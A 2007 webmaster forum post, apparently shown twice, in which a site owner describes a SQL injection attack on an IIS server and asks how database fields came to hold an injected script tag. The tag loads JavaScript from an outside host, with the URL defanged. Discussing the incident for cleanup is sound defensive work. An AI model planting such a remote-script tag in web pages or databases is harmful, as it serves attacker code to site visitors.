Webmaster Forums - Webmaster forum for HTML, PHP, ASP, CSS and more - View Single Post

mostlysunny · 11-04-2007, 01:27 PM

reviving this very interesting thread, first of all thanks for the wealth of info available, gives some comfort after a vicious attack!

Looking at the SQL table list and then analyzing the IIs logs, I noticed some Chineses dudes added the infamous D99_tmp on 20071102 and then the next day some fields in my database were filled by <script src="hXXtp://yl18.net/0.js"></script> (http removed) - problem is I can't find any trace of that script in the IIs logs so I'm confused as to how it got there, any thoughts ?

11-04-2007, 01:27 PM	#25 (permalink)
mostlysunny Junior Member Join Date: Nov 2007 Posts: 1	Re: Page being hijacked! reviving this very interesting thread, first of all thanks for the wealth of info available, gives some comfort after a vicious attack! Looking at the SQL table list and then analyzing the IIs logs, I noticed some Chineses dudes added the infamous D99_tmp on 20071102 and then the next day some fields in my database were filled by <script src="hXXtp://yl18.net/0.js"></script> (http removed) - problem is I can't find any trace of that script in the IIs logs so I'm confused as to how it got there, any thoughts ?